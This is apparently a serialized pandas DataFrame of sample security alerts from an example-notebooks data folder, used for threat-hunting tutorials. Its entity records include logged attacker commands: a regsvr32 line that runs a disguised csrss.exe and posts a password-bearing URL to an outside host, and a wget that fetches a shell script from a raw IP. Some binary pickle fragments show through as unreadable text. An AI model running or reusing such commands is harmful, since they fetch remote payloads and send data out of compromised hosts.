"5", "Directory": "c:\\windows\\system32", "Name": "cmd.exe", "Type": "file" }, { "$id": "6", "ProcessId": "0x12f4", "CommandLine": "", "ImageFile": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "7", "Name": "MSTICAdmin", "NTDomain": "MSTICAlertsWin1", "Host": { "$ref": "4" }, "Sid": "S-1-5-21-996632719-2361334927-4038480536-500", "IsDomainJoined": false, "Type": "account", "LogonId": "0x78225e" }, { "$id": "8", "Directory": "c:\\w!ndows\\system32", "Name": "regsvr32.exe", "Type": "file" }, { "$id": "9", "ProcessId": "0x1150", "CommandLine": ".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe \"http://www.401k.com/upload?pass=34592389\" post", "ElevationToken": "Default", "CreationTimeUtc": "2019-02-14T11:51:38.5072586Z", "ImageFile": { "$ref": "8" }, "Account": { "$ref": "7" }, "ParentProcess": { "$ref": "6" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "10", "SessionId": "0x78225e", "StartTimeUtc": "2019-02-14T11:51:38.5072586Z", "EndTimeUtc": "2019-02-14T11:51:38.5072586Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "7" } } ]�X� [ { "$id": "4", "DisplayName": "Modified system binary discovered", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Informational", "SystemAlertIds": [ "2518523287189999999_6e644c01-6feb-436b-9c96-46a86c9c16aa" ], "AlertType": "Modified system binary discovered", "VendorName": "Microsoft", "ProviderName": "AzureSCA", "StartTimeUtc": "2019-02-12T11:48:01Z", "EndTimeUtc": "2019-02-12T11:48:01Z", "Type": "alerts", "Location": "Central US" }, { "$id": "5", "DisplayName": "Suspiciously named process detected", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "High", "SystemAlertIds": [ "2518522053771835343_649075c9-dc5d-4a75-a848-9c51f70a45ae" ], "AlertType": "SCUBA_PROCESSNAMESIMILARITY", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T22:03:42.8164656Z", "EndTimeUtc": "2019-02-13T22:03:42.8164656Z", "Type": "alerts", "Location": "Central US" }, { "$id": "6", "DisplayName": "Digital currency mining related behavior detected", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "High", "SystemAlertIds": [ "2518522053771835343_cf383339-b4ff-4996-9d4e-83a4ece6688f" ], "AlertType": "SCUBA_RULE_DigitalCurrencyMiningTool", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T22:03:42.8164656Z", "EndTimeUtc": "2019-02-13T22:03:42.8164656Z", "Type": "alerts", "Location": "Central US" }, { "$id": "7", "DisplayName": "Detected potentially suspicious use of Telegram tool", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Medium", "SystemAlertIds": [ "2518522015557283714_a1008225-c62f-4f51-84aa-6aad89a02b3a" ], "AlertType": "SCUBA_RULE_Telegram_install", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T23:07:24.2716285Z", "EndTimeUtc": "2019-02-13T23:07:24.2716285Z", "Type": "alerts", "Location": "Central US" }, { "$id": "8", "DisplayName": "Detected the disabling of critical services", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Medium", "SystemAlertIds": [ "2518522015556924218_856f3dbd-ca72-474d-ab00-75956b161a02" ], "AlertType": "SCUBA_RULE_Lowering_Security_Settings", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T23:07:24.3075781Z", "EndTimeUtc": "2019-02-13T23:07:24.3075781Z", "Type": "alerts", "Location": "Central US" } ]��j�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x61a1", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2fdcd" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x61a7", "CommandLine": "wget http://23.97.60.214/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-18T15:29:22.207Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2fdcd", "StartTimeUtc": "2019-02-18T15:29:22.207Z", "EndTimeUtc": "2019-02-18T15:29:22.207Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�� Detection�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j��$40dcc8bf-0478-4f3b-b275-ed0a94f2c013�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j��asihuntomsworkspacerg�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�� SecurityAlert�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G��MSTICALERTSLXVM2�j�j�j�G�j�G�G�G�G�G�G�G�G�G��MSTICALERTSWIN1�G�j�j�G�j�et�be]�(h h}�(hhhK��h��R�(KK��h!�]�(h3h>h?h@hAet�bhENu��R�h h}�(hhhK��h��R�(KK��h!�]�h&at�bhENu��R�h h}�(hhhK��h��R�(KK��h!�]�h4at�bhENu��R�h h}�(hhhK��h��R�(KK��h!�]�(h%h'h(h)h*h+h,h-h.h/h0h1h2h5h6h7h8h9h:h;h<h=hBhCet�bhENu��R�e}��0.14.1�}�(�axes�h �blocks�]�(}�(�values�h\�mgr_locs�hhK��h��R�(KK��hR�C(�t�bu}�(j�hfj��builtins��slice��KKK��R�u}�(j�htj�j�KKK��R�u}�(j�h~j�hhK��h��R�(KK��hR�C� �t�bueust�b�_typ�� dataframe�� _metadata�]�ub.

tutorials-and-examples/example-notebooks/data/alerts_list.pkl (1,300 lines of code) (raw):